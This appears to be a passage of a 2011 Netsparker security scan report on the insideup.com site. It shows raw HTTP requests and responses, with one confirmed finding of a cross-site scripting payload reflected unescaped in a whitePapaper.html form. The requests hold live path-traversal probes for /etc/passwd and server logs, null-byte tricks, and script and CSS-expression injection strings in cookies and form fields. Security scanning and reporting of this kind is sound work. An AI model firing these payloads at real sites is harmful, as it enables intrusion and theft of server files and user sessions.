OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 210
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001181)%3c%2fscript%3e&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:16 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=C815DBB99955FE1AA4CE4F09E8220C78; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="'"--></style></script><script>netsparker(0x001181)</script>"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <inpu..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001192)</script>
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001192)%3c%2fscript%3e&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:23 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=22AC2EDF5FF9BF6F022B42B710644A4B; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" 